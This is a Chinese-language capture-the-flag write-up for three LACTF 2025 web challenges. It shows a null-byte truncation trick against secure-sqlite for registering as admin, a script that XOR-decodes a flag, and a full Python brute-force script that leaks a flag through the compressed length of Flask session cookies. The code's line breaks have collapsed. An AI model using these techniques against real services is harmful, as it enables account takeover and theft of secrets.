【Web】LACTF 2025 wp

目录

arclbroth

lucky-flag

whack-a-mole

arclbroth

看到username为admin能拿到flag

但不能重复注册存在的用户

这题是secure-sqlite这个库的问题，底层用的是C，没处理好\0字符截断的问题

（在 Node.js 中，由于其字符串表示方式，字符串可能包含空字节。然而，在 C 语言中，字符串以空字节终止。）

 插入数据库的时候只会保留\0前的admin

带着这个session去访问

成功截断

lucky-flag

很夸张了

看下main.js，发现flag的加密逻辑

让gpt写个脚本解一下

import json# 原始加密字符串
enc = r'"\u000e\u0003\u0001\u0016\u0004\u0019\u0015V\u0011=\u000bU=\u000e\u0017\u0001\t=R\u0010=\u0011\t\u000bSS\u001f"'# 1. 解析 JSON（类似 JavaScript 的 JSON.parse）
parsed = json.loads(enc)# 2. 对每个字符进行 XOR 0x62 运算
rw = []
for c in parsed:xor_result = ord(c) ^ 0x62  # ord() 获取 Unicode 码点rw.append(xor_result)# 3. 将 ASCII 码转换为字符并拼接
flag = ''.join([chr(x) for x in rw])print(f"Flag: {flag}")

whack-a-mole

password 是 Flag的变形（每个字符ASCII码 + funny_num mod 128）

要求username等于变形后的password

考察flask的session机制

客户端 session 导致的安全问题 | 离别歌 

flask生成的session会对相同字符串进行zlip压缩（这里则是username为password的子串时）

通过session长度差异进行侧信道攻击

爆破脚本

import string
import requests# 目标网站基础URL
BASE_URL = "http://27.25.151.98:10001/"# 可能的flag字符（字母、数字、花括号、下划线）
ALLOWED_CHARS = string.ascii_letters + string.digits + "{}_"# 随机填充字符串，用于调整cookie长度
RANDOM_PADDING = "q3aUrDpfmRzMzABTCILvXCOA3Us"# 创建一个会话对象，维持登录状态
session = requests.Session()def get_session_length(guess_username):"""提交用户名猜测，返回加密后的session cookie长度"""response = session.post(BASE_URL.rstrip("/") + "/login",data={"username": guess_username, "funny": "0"},allow_redirects=False,)encrypted_session = session.cookies["session"]return len(encrypted_session)def construct_guess(current_prefix, test_char, padding_length):"""构造猜测字符串：重复 (current_prefix + test_char) + 填充"""repeated_guess = (current_prefix + test_char) * 16  # 16次重复以提高压缩率padded_guess = repeated_guess + RANDOM_PADDING[:padding_length]return padded_guessdef find_next_char(current_flag_prefix):"""尝试找出下一个正确的flag字符"""for padding in range(16):  # 尝试不同的填充长度（0-15）char_results = []for char in ALLOWED_CHARS:guess = construct_guess(current_flag_prefix, char, padding)session_length = get_session_length(guess)char_results.append((session_length, char))# 按session长度排序，最短的可能包含flag片段char_results.sort()# 如果最短长度的字符唯一，则认为是正确的if char_results[0][0] != char_results[1][0]:return char_results[0][1], paddingreturn None, None  # 如果没有找到，返回Nonedef main():current_flag = "lac"  # 初始已知的flag前缀best_padding = 0  # 记录当前最优的填充长度while "}" not in current_flag:  # 直到flag结束（以 } 结尾）next_char, best_padding = find_next_char(current_flag)if next_char is None:print("无法找到下一个字符！")breakcurrent_flag += next_charprint(current_flag)  # 输出当前flag猜测if __name__ == "__main__":main()